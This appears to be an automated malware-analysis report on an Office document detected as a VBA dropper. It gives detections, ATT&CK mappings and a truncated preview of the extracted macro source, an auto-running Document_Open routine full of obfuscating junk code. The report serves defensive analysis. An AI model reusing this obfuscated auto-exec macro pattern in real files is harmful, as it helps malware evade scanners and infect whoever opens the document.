MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function for execution. This indicates an attempt to run external code, likely a downloader for a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6344763-0' further supports its malicious nature as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6344763-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6344763-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 82922 bytes |
SHA-256: 6c03227413725a4333f3292ac08e4cc8ddbef27624e27300abe82bdfa2e9596d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() L64JVi83 = "V6upEIBH" L64JVi83 = LTrim(Mid(L64JVi83, -1643 + 1654, -1643 + 1654)) JCVAJY6 = "poGiJOL" If Len(JCVAJY6) > 156 Then sBpku = "jKg4A" MsgBox sBpku, 63, "RhfdS" End If Tf2sFa = "oI1RV" If Len(Tf2sFa) > 156 Then YaxTIDuhl = "pOUc9KF6" MsgBox YaxTIDuhl, 63, "vLj4B8ncS" End If Vpr83DbwT = "jQ6xpZhuk" Vpr83DbwT = Trim(Mid(Vpr83DbwT, -1632 + 1642, -1632 + 1642)) MnSQNCVu = "WTgQwOuB" If Len(MnSQNCVu) > 173 Then B8zWQovN = "AxIwLKA" MsgBox B8zWQovN, 58, "foCES" End If Rktq5O76 = "YV5ty" Rktq5O76 = LTrim(Mid(Rktq5O76, -1632 + 1642, -1632 + 1642)) lNYMIF = "51GJo" ad5b0gu4V = "UGbpZ" AeYlxs3P = "gQsDb" AeYlxs3P = Trim(Mid(AeYlxs3P, -2717 + 2727, -2717 + 2727)) D3JbZ = "IpwsUM" D3JbZ = RTrim(Mid(D3JbZ, -2717 + 2727, -2717 + 2727)) RER5ueVlv = "eXqh3M9d1" RER5ueVlv = Trim(Mid(RER5ueVlv, -2309 + 2314, -2309 + 2314)) xEC2uS1I = "Qoh8pfId" xEC2uS1I = Trim(Mid(xEC2uS1I, -2309 + 2314, -2309 + 2314)) ZQJzKTt = "walb0" ZQJzKTt = RTrim(Mid(ZQJzKTt, -2309 + 2314, -2309 + 2314)) Dim IlyCB53D IlyCB53D = lNYMIF & ad5b0gu4V LMjk1emG = "hp2Ls5m" I30q9nyT = "Lhh" qMtb9ay = "Pl3rsYVP" qMtb9ay = Trim(Mid(qMtb9ay, -1635 + 1641, -1635 + 1641)) Slt913j = "QcuqCw1Z" If Len(Slt913j) > 233 Then dW2lLg = "Irbsayk" MsgBox dW2lLg, 62, "R2mYUKkE" End If NhJGz = "nkyeZfI" NhJGz = Trim(Mid(NhJGz, -1635 + 1641, -1635 + 1641)) YAC8N4q6T = "p3SIN" YAC8N4q6T = RTrim(Mid(YAC8N4q6T, 26493 - 26492, 26493 - 26492)) ivmElgqnR = "u2N3PKs7C" ivmElgqnR = LTrim(Mid(ivmElgqnR, 26493 - 26492, 26493 - 26492)) sLjoD = "dq9wR2" If Len(sLjoD) > 175 Then ahRHlB = "nAtCZl4" MsgBox ahRHlB, 62, "r9DYZ" End If I2LpPClf = "QoWqY" I2LpPClf = RTrim(Mid(I2LpPClf, 13656 / 13656, 13656 / 13656)) Dim yeE0j9ug yeE0j9ug = LMjk1emG & I30q9nyT ylteANh = "WYlJ3bmtz" fOL8mS6kp = "J" ZtfqP = "aowxIJ" If Len(ZtfqP) > 254 Then GthXxTJ6 = "X7pHLZBvt" MsgBox GthXxTJ6, 27, "oMITo8" End If b7XVPJ5Hp = "v5OPxyd" If Len(b7XVPJ5Hp) > 254 Then pfgauje = "EvlnmoHzK" MsgBox pfgauje, 27, "SjuwbdI" End If eogyB = "w9trPNVM" eogyB = LTrim(Mid(eogyB, -5058 + 5061, -5058 + 5061)) WHsW7m = "IGOsM" WHsW7m = LTrim(Mid(WHsW7m, -5058 + 5061, -5058 + 5061)) C0WU1OCaT = "IGw5Be" If Len(C0WU1OCaT) > 176 Then KL0BM = "zeHE7Q" MsgBox KL0BM, 24, "Y4Mhkmq" End If CcNowsvL = "R09P2k" CcNowsvL = Trim(Mid(CcNowsvL, -5058 + 5061, -5058 + 5061)) Dim V64u1 V64u1 = ylteANh & fOL8mS6kp qNlYWB = "yVXetRCKo" i81Di3Qm = Chr(78) RIWi4NKR = "MVx7KjZh0" If Len(RIWi4NKR) > 161 Then E5oLT79mn = "OdIjXqx" MsgBox E5oLT79mn, 53, "CeT3Qvy" End If glb7RzX = "LANut" glb7RzX = Trim(Mid(glb7RzX, 2693 - 2681, 2693 - 2681)) PWLKXzeh8 = "czqV0" If Len(PWLKXzeh8) > 230 Then mcue3M17 = "jDke5gi" MsgBox mcue3M17, 3, "L2MFKa5E" End If ENgym = "aDH4e" ENgym = LTrim(Mid(ENgym, 1547 - 1531, 1547 - 1531)) yJYkbjRS = "NvuL5HsZ" yJYkbjRS = RTrim(Mid(yJYkbjRS, 1547 - 1531, 1547 - 1531)) Dim TPtm3fla TPtm3fla = qNlYWB & i81Di3Qm y13H7ys = "E5" mnPNIXU = "CduVWas" xN5Vu = "N" eO0lu = "El0kv" If Len(eO0lu) > 151 Then Wd98Agi0G = "f4iYPD1" MsgBox Wd98Agi0G, 13, "DYs79dfCE" End If wDL2KXTI = "OQxjNof" wDL2KXTI = Trim(Mid(wDL2KXTI, 26377 / 2029, 26377 / 2029)) zSAMVQlB = "fgSfZ0W1a" If Len(zSAMVQlB) > 212 Then BsIUZlJ = "xbs48xzG" MsgBox BsIUZlJ, 52, "uqzdvaEly" End If oHP9NBYa = "n5fidZ3Ol" If Len(oHP9NBYa) > 212 Then EBAjVC = "otolGgH4r" MsgBox EBAjVC, 52, "q9FaUj" End If CvWwxQ = "jWDwn7ut0" CvWwxQ = LTrim(Mid(CvWwxQ, 8996 / 692, 8996 / 692)) WpEJf = "KiPCV4Koz" WpEJf = RTrim(Mid(WpEJf, 8996 / 692, 8996 / 692)) zz3tDlVh9 = "j2fpjX" zz3tDlVh9 = RTrim(Mid(zz3tDlVh9, 8996 / 692, 8996 / 692)) TEY6wi = "TJQ6lYVbZ" TEY6wi = RTrim(Mid(TEY6wi, 24714 / 8238, 24714 / 8238)) x4Vv2 = "NFXW6u" x4Vv2 = LTrim(Mid(x4Vv2, 24714 / 8238, 247 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.